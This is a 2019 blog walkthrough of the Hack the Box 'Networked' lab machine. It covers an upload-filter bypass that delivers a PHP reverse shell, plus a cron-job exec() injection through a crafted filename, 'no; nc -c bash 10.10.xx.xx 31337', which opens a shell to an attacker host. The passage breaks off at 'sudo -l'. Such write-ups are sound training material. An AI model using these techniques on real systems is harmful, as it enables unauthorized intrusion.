<!DOCTYPE html>





<html lang="en" 
  
    mode="dark"
  
 >

  <!--
  The Head
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="theme" content="Chirpy v2.5.1">

  <title>Hack the Box - Networked | Quantumly Confused
  </title>

  <meta name="description" content="HTB Networked machine walkthrough. Generally discussed as the easiest of the active boxes at time of retirement there is nothing particularly complex with getting to root.">
  <meta name="keywords" content="hackthebox,htb,pentest,redteam,writeup,walkthrough,networked,sudo,dir buster,dirb,cron job,cron">
  <link rel="canonical" href="https://blog.quantumlyconfused.com/hack-the-box/2019/11/16/htb-machine-networked/" />

  <meta name="twitter:title" content="HacktheBox Writeup - Networked - QuantumlyConfused">
  <meta name="twitter:description" content="HTB Networked machine walkthrough. Generally discussed as the easiest of the active boxes at time of retirement there is nothing...">
  <meta name="twitter:image" content="https://blog.quantumlyconfused.com/assets/htb-networked/infocard.PNG">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@_PatrickDowning" />
  <meta name="twitter:creator" content="@_PatrickDowning" />

  <meta property="og:title" content="HacktheBox Writeup - Networked - QuantumlyConfused">
  <meta property="og:description" content="HTB Networked machine walkthrough. Generally discussed as the easiest of the active boxes at time of retirement there is nothing...">
  <meta property="og:image" content="https://blog.quantumlyconfused.com/assets/htb-networked/infocard.PNG">
  <meta property="og:url" content="https://blog.quantumlyconfused.com/hack-the-box/2019/11/16/htb-machine-networked/">

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://www.favicon-generator.org/
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2019 Cotes Chung
  Published under the MIT license
-->



<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">
<link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon">

<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png">
<link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png">
<link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png">

<link rel="icon" type="image/png" sizes="192x192"  href="/assets/img/favicons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="manifest" href="/assets/img/favicons/manifest.json">
<meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'>
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
    <link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials">
    <link rel="dns-prefetch" href="https://www.google-analytics.com">

    <link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous">
    <link rel="dns-prefetch" href="https://www.googletagmanager.com">

    

    <!-- Global site tag (gtag.js) - Google Analytics-->

<meta name="google-site-verification" content="4x5Z0Ong7lBlu0f5GVm2D_Fma9DU4A_GvFaBJA5lOOo" />
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-148947358-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  
  gtag('js', new Date());
  gtag('config', 'UA-148947358-1');
</script>



  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
    integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous">

  <!-- Font Awesome -->
  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"
    integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ="
    crossorigin="anonymous">

  <!--
  CSS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <link rel="preload" as="style" href="/assets/css/post.css">
  <link rel="stylesheet" href="/assets/css/post.css">

  

    <link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css">
    <link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" />

  




  <!-- JavaScripts -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

  <script async
    src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>

  <!--
  JS selector for site.
  Chirpy v2.3
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT Licensed
-->



  <script async src="/assets/js/post.min.js"></script>

  





  <!-- PWA -->
  <script defer src="/app.js"></script>



  <script data-ad-client="ca-pub-1349331648978464" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

  <!-- Cookie Consent by https://www.PrivacyPolicies.com -->
  <script type="text/javascript" src="//www.privacypolicies.com/public/cookie-consent/4.0.0/cookie-consent.js"></script>
  <script type="text/javascript">
  document.addEventListener('DOMContentLoaded', function () {
  cookieconsent.run({"notice_banner_type":"headline","consent_type":"express","palette":"dark","language":"en","website_name":"https://blog.quantumlyconfused.com","website_privacy_policy_url":"https://blog.quantumlyconfused.com/tabs/disclaimer/"});
  });
  </script>
  <noscript><a href="https://www.PrivacyPolicies.com/cookie-consent/">Cookie Consent by PrivacyPolicies.com</a></noscript>

</head>


  <body data-spy="scroll" data-target="#toc">

    <div id="sidebar" class="d-flex flex-column">
      <!--
  The Side Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="nav-wrapper">
  <div id="profile-wrapper" class="d-flex flex-column">
    <div id="avatar" class="d-flex justify-content-center">
      <a href="/" alt="avatar">
        
        
        
        <img src="/assets/img/sample/padraignix.png" alt="avatar" onerror="this.style.display='none'">
      </a>
    </div>

    <div class="profile-text mt-3">
      <div class="site-title">
        <a href="/">Quantumly Confused</a>
      </div>
      <div class="site-subtitle font-italic">Quantum, InfoSec, Crypto, CTFs, and related adventures</div>
    </div>
  </div>

  <ul class="nav flex-column">
  

  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/projects/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-puzzle-piece ml-xl-3 mr-xl-3 unloaded"></i>
        <span>PROJECTS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i>
        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
  
    

    

    <li class="nav-item d-flex justify-content-center
      ">
      <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100">
        <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i>
        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
  

  </ul> <!-- ul.nav.flex-column -->

</div><!-- #nav-wrapper -->

<div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4">

  

  
    

    
    <a href="https://twitter.com/_PatrickDowning" aria-label="twitter" target="_blank" rel="noopener">
      <i class="fab fa-twitter"></i>
    </a>
    
  
    

    
    <a href="https://www.linkedin.com/in/downingpatrick/" aria-label="linkedin" target="_blank" rel="noopener">
      <i class="fab fa-linkedin"></i>
    </a>
    
  
    

    
    <a href="https://www.reddit.com/user/Padraignix" aria-label="reddit" target="_blank" rel="noopener">
      <i class="fab fa-reddit-alien"></i>
    </a>
    
  
    

    
    <a href="https://github.com/padraignix" aria-label="github" target="_blank" rel="noopener">
      <i class="fab fa-github-alt"></i>
    </a>
    
  
    

    
    <a href="https://www.twitch.tv/padraignix" aria-label="hackthebox" target="_blank" rel="noopener">
      <i class="fab fa-twitch"></i>
    </a>
    
  
    

    
    <a href="/feed.xml" aria-label="rss" >
      <i class="fas fa-rss"></i>
    </a>
    
  

</div>

    </div>

    <!--
  The Top Bar
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->
<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">
      
        
        <span>
          <a href="/">
            Posts
          </a>
        </span>
        
      

      
        <span>Hack the Box - Networked</span>
      

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
    Post
    </div>

    <i id="search-trigger" ></i>
    <!--<span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>-->
    <span id="search-cancel" >Cancel</span>
    <!--<i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>-->
    </span>
    <span id="search-cancel" ></span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        <!--
  Refactor the HTML structure.
-->



<!--
  Suroundding the markdown table with '<div class="table-wrapper">. and '</div>'
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->


<div class="row">

  <div id="post-wrapper" class="col-12 col-lg-11 col-xl-8">

    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

      <h1 data-toc-skip>Hack the Box - Networked</h1>

      <div class="post-meta text-muted d-flex flex-column">
        <!-- Published date and author -->
        <div>
          Posted
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago "
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Nov 16, 2019,  9:00 AM -0500"
  >

  
  

  
    Nov 16, 2019
  

  <i class="unloaded">2019-11-16T09:00:00-05:00</i>

</span>
          by
          <span class="author">
          
            Patrick Downing
          
          </span>
        </div>

        <!-- lastmod -->
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
        
          
          
            
            

        
        <div>
          Updated
          <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago lastmod"
  
    data-toggle="tooltip"
    data-placement="bottom"
    title="Sat, Nov 14, 2020,  4:36 PM -0500"
  >

  
  

  
    Nov 14, 2020
  

  <i class="unloaded">2020-11-14T16:36:16-05:00</i>

</span>
        </div>
        

        <!-- page views -->
        

      </div> <!-- .post-meta -->

      <div class="post-content">

        

        <!-- Using lozad. See: <https://github.com/ApoorvSaxena/lozad.js#usage> -->
        
          
          <h1>Introduction</h1>
<p>
<img width="75%" height="75%" src="/assets/htb-networked/infocard.PNG" />
</p>

<p>Networked was a good introduction to the world of HTB. Generally discussed as the easiest of the active boxes at time of retirement there is nothing particularly complex with getting to root. Initial foothold involved byassing upload restrictions to get a reverse shell initiated. User pivot required abusing an existing cron job running as our user guly. Finally, root required leveraging a sudo script and escaping the constraints to execute arbitrary code as root.</p>

<h1>Initial Recon</h1>

<p>Kicking it off with an NMAP scan.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-nmap.PNG" />
</p>

<p>Let's pop open the browser and take a look at what we can find.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-site1.PNG" />
</p>

<p>Hum, didn't see very much so let's see if directory buster can discover anything further for us.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-dirb.PNG" />
</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-upload3.PNG" />
</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-upload.PNG" />
</p>

<p>Awesome, look's like we potentially have some capability to upload files. Let's try uploading a php reverse shell from pentestmonkey.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-upload2.PNG" />
</p>

<p>After attempting a few different variants including tacking on <code>.jpg</code> to my <code>.php</code> it was still being blocked. Taking a step back I explored the remainder of the identified locations and backup provided an interesting item.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-backup.PNG" />
</p>

<p>Well now isn't that interesting! A backup of the files being used for the site, including <code>upload.php</code>. Perfect, now we can take a look at restrictions imposed on the potential upload.</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php">cat upload.php
<span class="cp">&lt;?php</span>
<span class="k">require</span> <span class="s1">'lib.php'</span><span class="p">;</span>

<span class="nb">define</span><span class="p">(</span><span class="s2">"UPLOAD_DIR"</span><span class="p">,</span> <span class="s2">"uploads/"</span><span class="p">);</span>

<span class="k">if</span><span class="p">(</span> <span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'submit'</span><span class="p">])</span> <span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">empty</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">"myFile"</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nv">$myFile</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s2">"myFile"</span><span class="p">];</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nf">check_file_type</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">"myFile"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nb">filesize</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'myFile'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">])</span> <span class="o">&lt;</span> <span class="mi">60000</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s1">'&lt;pre&gt;Invalid image file1.&lt;/pre&gt;'</span><span class="p">;</span>
      <span class="nf">displayform</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">"error"</span><span class="p">]</span> <span class="o">!==</span> <span class="no">UPLOAD_ERR_OK</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">"&lt;p&gt;An error occurred.&lt;/p&gt;"</span><span class="p">;</span>
        <span class="nf">displayform</span><span class="p">();</span>
        <span class="k">exit</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];</span>
    <span class="k">list</span> <span class="p">(</span><span class="nv">$foo</span><span class="p">,</span><span class="nv">$ext</span><span class="p">)</span> <span class="o">=</span> <span class="nf">getnameUpload</span><span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]);</span>
    <span class="nv">$validext</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">'.jpg'</span><span class="p">,</span> <span class="s1">'.png'</span><span class="p">,</span> <span class="s1">'.gif'</span><span class="p">,</span> <span class="s1">'.jpeg'</span><span class="p">);</span>
    <span class="nv">$valid</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
    <span class="k">foreach</span> <span class="p">(</span><span class="nv">$validext</span> <span class="k">as</span> <span class="nv">$vext</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nb">substr_compare</span><span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">"name"</span><span class="p">],</span> <span class="nv">$vext</span><span class="p">,</span> <span class="o">-</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$vext</span><span class="p">))</span> <span class="o">===</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$valid</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nv">$valid</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"&lt;p&gt;Invalid image file2&lt;/p&gt;"</span><span class="p">;</span>
      <span class="nf">displayform</span><span class="p">();</span>
      <span class="k">exit</span><span class="p">;</span>
    <span class="p">}</span></code></pre></figure>

<figure class="highlight"><pre><code class="language-php" data-lang="php">cat lib.php 
<span class="cp">&lt;?php</span>
<span class="mf">...</span>
<span class="k">function</span> <span class="n">file_mime_type</span><span class="p">(</span><span class="nv">$file</span><span class="p">)</span> <span class="p">{</span>
  <span class="nv">$regexp</span> <span class="o">=</span> <span class="s1">'/^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/'</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="nb">function_exists</span><span class="p">(</span><span class="s1">'finfo_file'</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$finfo</span> <span class="o">=</span> <span class="nb">finfo_open</span><span class="p">(</span><span class="no">FILEINFO_MIME</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">is_resource</span><span class="p">(</span><span class="nv">$finfo</span><span class="p">))</span> <span class="c1">// It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system</span>
    <span class="p">{</span>
      <span class="nv">$mime</span> <span class="o">=</span> <span class="o">@</span><span class="nb">finfo_file</span><span class="p">(</span><span class="nv">$finfo</span><span class="p">,</span> <span class="nv">$file</span><span class="p">[</span><span class="s1">'tmp_name'</span><span class="p">]);</span>
      <span class="nb">finfo_close</span><span class="p">(</span><span class="nv">$finfo</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="nb">is_string</span><span class="p">(</span><span class="nv">$mime</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nb">preg_match</span><span class="p">(</span><span class="nv">$regexp</span><span class="p">,</span> <span class="nv">$mime</span><span class="p">,</span> <span class="nv">$matches</span><span class="p">))</span> <span class="p">{</span>
        <span class="nv">$file_type</span> <span class="o">=</span> <span class="nv">$matches</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
        <span class="k">return</span> <span class="nv">$file_type</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="k">if</span> <span class="p">(</span><span class="nb">function_exists</span><span class="p">(</span><span class="s1">'mime_content_type'</span><span class="p">))</span>
  <span class="p">{</span>
    <span class="nv">$file_type</span> <span class="o">=</span> <span class="o">@</span><span class="nb">mime_content_type</span><span class="p">(</span><span class="nv">$file</span><span class="p">[</span><span class="s1">'tmp_name'</span><span class="p">]);</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$file_type</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="c1">// It's possible that mime_content_type() returns FALSE or an empty string</span>
    <span class="p">{</span>
      <span class="k">return</span> <span class="nv">$file_type</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="nv">$file</span><span class="p">[</span><span class="s1">'type'</span><span class="p">];</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">check_file_type</span><span class="p">(</span><span class="nv">$file</span><span class="p">)</span> <span class="p">{</span>
  <span class="nv">$mime_type</span> <span class="o">=</span> <span class="nf">file_mime_type</span><span class="p">(</span><span class="nv">$file</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="nb">strpos</span><span class="p">(</span><span class="nv">$mime_type</span><span class="p">,</span> <span class="s1">'image/'</span><span class="p">)</span> <span class="o">===</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
      <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
  <span class="p">}</span>  
<span class="p">}</span></code></pre></figure>

<p>Now with an understanding of what the restrictions are we are able to follow along with <a href="https://github.com/xapax/security/blob/master/bypass_image_upload.md">this page</a> and insert a <code>GIF89a;</code> at the top of the php reverse shell. It was successful and going to the <code>photos.php</code> page with a reverse listener active we are able to get our initial foothold.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/recon-apache.PNG" />
</p>

<h1>User exploitation</h1>

<p>Unfortunately this shell did not grant us access to the user flag so we need to figure out a pivot to the true user. After some initial enumeration I stumbled onto the following cronjob.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">sh-4.2<span class="nv">$ </span><span class="nb">cat </span>cron	
<span class="nb">cat </span>crontab.guly 
<span class="k">*</span>/3 <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> php /home/guly/check_attack.php</code></pre></figure>

<p>Now checking what the <code>check_attack.php</code> script actually does...</p>

<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="n">sh</span><span class="o">-</span><span class="mf">4.2</span><span class="err">$</span> <span class="n">cat</span> <span class="n">check</span>	
<span class="n">cat</span> <span class="n">check_attack</span><span class="mf">.</span><span class="n">php</span> 
<span class="o">&lt;?</span><span class="n">php</span>
<span class="k">require</span> <span class="s1">'/var/www/html/lib.php'</span><span class="p">;</span>
<span class="nv">$path</span> <span class="o">=</span> <span class="s1">'/var/www/html/uploads/'</span><span class="p">;</span>
<span class="nv">$logpath</span> <span class="o">=</span> <span class="s1">'/tmp/attack.log'</span><span class="p">;</span>
<span class="nv">$to</span> <span class="o">=</span> <span class="s1">'guly'</span><span class="p">;</span>
<span class="nv">$msg</span><span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="nv">$headers</span> <span class="o">=</span> <span class="s2">"X-Mailer: check_attack.php</span><span class="se">\r\n</span><span class="s2">"</span><span class="p">;</span>

<span class="nv">$files</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
<span class="nv">$files</span> <span class="o">=</span> <span class="nb">preg_grep</span><span class="p">(</span><span class="s1">'/^([^.])/'</span><span class="p">,</span> <span class="nb">scandir</span><span class="p">(</span><span class="nv">$path</span><span class="p">));</span>

<span class="k">foreach</span> <span class="p">(</span><span class="nv">$files</span> <span class="k">as</span> <span class="nv">$key</span> <span class="o">=&gt;</span> <span class="nv">$value</span><span class="p">)</span> <span class="p">{</span>
	<span class="nv">$msg</span><span class="o">=</span><span class="s1">''</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="nv">$value</span> <span class="o">==</span> <span class="s1">'index.html'</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">continue</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="c1">#echo "-------------\n";</span>

  <span class="c1">#print "check: $value\n";</span>
  <span class="k">list</span> <span class="p">(</span><span class="nv">$name</span><span class="p">,</span><span class="nv">$ext</span><span class="p">)</span> <span class="o">=</span> <span class="nf">getnameCheck</span><span class="p">(</span><span class="nv">$value</span><span class="p">);</span>
  <span class="nv">$check</span> <span class="o">=</span> <span class="nf">check_ip</span><span class="p">(</span><span class="nv">$name</span><span class="p">,</span><span class="nv">$value</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nv">$check</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"attack!</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
    <span class="c1"># todo: attach file</span>
    <span class="nb">file_put_contents</span><span class="p">(</span><span class="nv">$logpath</span><span class="p">,</span> <span class="nv">$msg</span><span class="p">,</span> <span class="no">FILE_APPEND</span> <span class="o">|</span> <span class="no">LOCK_EX</span><span class="p">);</span>

    <span class="nb">exec</span><span class="p">(</span><span class="s2">"rm -f </span><span class="nv">$logpath</span><span class="s2">"</span><span class="p">);</span>
    <span class="nb">exec</span><span class="p">(</span><span class="s2">"nohup /bin/rm -f </span><span class="nv">$path$value</span><span class="s2"> &gt; /dev/null 2&gt;&amp;1 &amp;"</span><span class="p">);</span>
    <span class="k">echo</span> <span class="s2">"rm -f </span><span class="nv">$path$value</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">mail</span><span class="p">(</span><span class="nv">$to</span><span class="p">,</span> <span class="nv">$msg</span><span class="p">,</span> <span class="nv">$msg</span><span class="p">,</span> <span class="nv">$headers</span><span class="p">,</span> <span class="s2">"-F</span><span class="nv">$value</span><span class="s2">"</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="cp">?&gt;</span></code></pre></figure>

<p>The interesting part is the <code>exec</code> line where we control the contents of <code>$value</code>. Carefully crafting a test file we should be able to arbitrarily execute code as the user <code>guly</code>. Let's give a shot.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell">sh-4.2<span class="nv">$ </span><span class="nb">touch</span> <span class="s2">"no; nc -c bash 10.10.xx.xx 31337"</span>
<span class="nb">touch</span> <span class="s2">"no; nc -c bash 10.10.xx.xx 31337"</span></code></pre></figure>

<p>Now with another nc listener setup, we wait for the cronjob to kick off.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/user.PNG" />
</p>

<p>With that user is done. Unto root!</p>

<h1>Root exploitation</h1>

<p>Root was rather simple comparatively. With our <code>guly</code> shell we kick off another round of enumeration. Quickly find that there is a root sudo rule in place.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>guly on networked:
